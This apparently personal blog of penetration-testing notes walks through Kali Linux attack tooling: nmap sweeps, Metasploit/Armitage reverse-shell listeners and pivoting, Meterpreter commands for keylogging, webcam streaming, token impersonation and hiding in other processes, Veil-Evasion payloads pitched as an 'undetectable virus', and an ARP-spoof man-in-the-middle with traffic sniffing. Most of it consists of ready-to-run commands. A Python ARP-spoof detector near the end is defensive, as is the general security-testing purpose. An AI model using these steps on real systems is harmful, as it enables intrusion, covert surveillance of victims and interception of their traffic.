A while back I was tasked with some penetration testing. I plan to put a collection of what I did here.
I use Kali Linux for my testing.
nmap
Here is an example of a command that scans for any open ports on the 192.168.1.0 network (note that the /16 mask as written covers the whole 192.168.0.0/16 range; -sV grabs service versions, -O fingerprints the OS, and -oX writes the results as XML to the given path):
nmap -v -p 1-65535 -sV -O -sS -T4 -oX (path-to-xml.xml) 192.168.1.0/16
More nmap examples can be found here
Armitage
Open the listener like so:
- Armitage > Listeners > Reverse (wait for)
- Enter the port you used in your exploit (the virus)
- Set the type to meterpreter
- The listener is now running
Once a machine is compromised, Armitage displays lightning bolts on it. Here are helpful things to do in Armitage:
- Right click the compromised machine and select Meterpreter X > Access > Pass Session. This creates another session; do this so you have a backup in case the one you are in crashes.
- Select Meterpreter X > Pivoting > Setup, click the network you want and select Add Pivot. This sets up a pivot point to attack machines accessible from the compromised machine.
Meterpreter Shell
getsystem – attempts to elevate your privilege to that of local SYSTEM
webcam_stream – play a video stream from the webcam
webcam_list – list webcams
keyscan_start – log keystrokes (be sure to open another Meterpreter session before doing this as it may crash the current one)
keyscan_stop – stops logging keystrokes
use incognito – loads the incognito extension for token impersonation etc.
list_tokens – list available tokens (incognito must be loaded)
impersonate_token archq\\administrator – impersonate the specified token (incognito must be loaded)
getuid – shows the user the current session is running as
getsid – get the SID of the user the process is running as
ps – list processes
migrate PID – migrate into the given process; this helps hide your program
shell – drops you into cmd.exe on that Windows machine
Msfconsole Commands
msfupdate – updates the framework
To set up a reverse shell handler:
use exploit/multi/handler
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST [your listening IP address]
set LPORT 4444
exploit
Veil-evasion
Use this to create your own undetectable virus (unknown how well it evades detection now; it has been several years since I tested).
You will want to set up a meterpreter listener that this virus will connect back to.
list
use 35 (or use python/shellcode_inject/aes_encrypt)
configure the information, then type:
generate
use the output file on the machine you want to compromise
Man in the Middle Attack
Enable IP forwarding like so (otherwise the victim's traffic stops at your machine instead of being relayed):
echo 1 >> /proc/sys/net/ipv4/ip_forward
Now set up the ARP spoof:
arpspoof -i eth0 -t [IP Address of Victim] [Router IP Address]
Then do it the opposite way:
arpspoof -i eth0 -t [Router IP Address] [IP Address of Victim]
Once that is working you can sniff traffic to and from that machine with wireshark, run driftnet to see the pages they visit, or run urlsnarf to log the URLs they request:
driftnet -i eth0
wireshark
urlsnarf -i eth0
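From the defender's side, the ARP spoof above leaves a visible trace on the victim: the gateway's entry in the neighbour cache flips to the attacker's MAC, and that MAC now appears against two IPs at once. The following is an added example (not from the original notes) that parses `ip neigh show` output and raises both signals: a gateway MAC that differs from a recorded baseline, and one MAC claimed by several IPs. The sample output, the BASELINE mapping and the function names are constructed for this example.

```python
import re
from collections import defaultdict

# Constructed sample of `ip neigh show` output on a Linux host; not from a real network.
# The gateway (.1) and a second host (.20) both resolve to the same MAC here.
SAMPLE_NEIGH = """192.168.1.1 dev eth0 lladdr 00:11:22:33:44:55 REACHABLE
192.168.1.20 dev eth0 lladdr 00:11:22:33:44:55 REACHABLE
192.168.1.30 dev eth0 lladdr 66:77:88:99:aa:bb STALE
192.168.1.40 dev eth0  FAILED
"""

# Known-good gateway MAC recorded on a trusted network (constructed value).
BASELINE = {"192.168.1.1": "aa:bb:cc:dd:ee:01"}

# Matches "<ip> dev <iface> [lladdr <mac>] <state>"; FAILED entries carry no lladdr.
NEIGH_RE = re.compile(
    r"^(?P<ip>\S+)\s+dev\s+(?P<dev>\S+)"
    r"(?:\s+lladdr\s+(?P<mac>[0-9a-fA-F:]{17}))?\s+(?P<state>\S+)$"
)


def parse_neigh(text):
    """Return [(ip, mac), ...] for entries that have a resolved hardware address."""
    entries = []
    for line in text.splitlines():
        m = NEIGH_RE.match(line.strip())
        if m and m.group("mac"):
            entries.append((m.group("ip"), m.group("mac").lower()))
    return entries


def find_arp_anomalies(entries, baseline):
    """Return findings as tuples; an empty list means nothing suspicious was seen.

    ("gateway_mac_changed", ip, mac)      baseline IP now maps to a different MAC
    ("duplicate_mac", mac, (ip, ip, ...)) one MAC answers for more than one IP
    """
    findings = []
    by_mac = defaultdict(list)
    for ip, mac in entries:
        by_mac[mac].append(ip)
        expected = baseline.get(ip)
        if expected and mac != expected.lower():
            findings.append(("gateway_mac_changed", ip, mac))
    for mac, ips in by_mac.items():
        if len(ips) > 1:
            findings.append(("duplicate_mac", mac, tuple(sorted(ips))))
    return findings


if __name__ == "__main__":
    import subprocess  # read the live neighbour table when run on a host
    live = subprocess.run(["ip", "neigh", "show"], capture_output=True, text=True).stdout
    for finding in find_arp_anomalies(parse_neigh(live), BASELINE):
        print(finding)
```

Run it periodically (cron or a systemd timer) with a baseline captured on a known-clean network; a duplicate-MAC finding that involves the gateway is the classic arpspoof signature, while a changed gateway MAC alone can also just be a replaced router, so correlate with change records before escalating.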
Enable Auto Login as Root
Open /etc/gdm3/daemon.conf (for example with leafpad) and uncomment these lines:
[daemon]
# Enabling automatic login
AutomaticLoginEnable = true
AutomaticLogin = root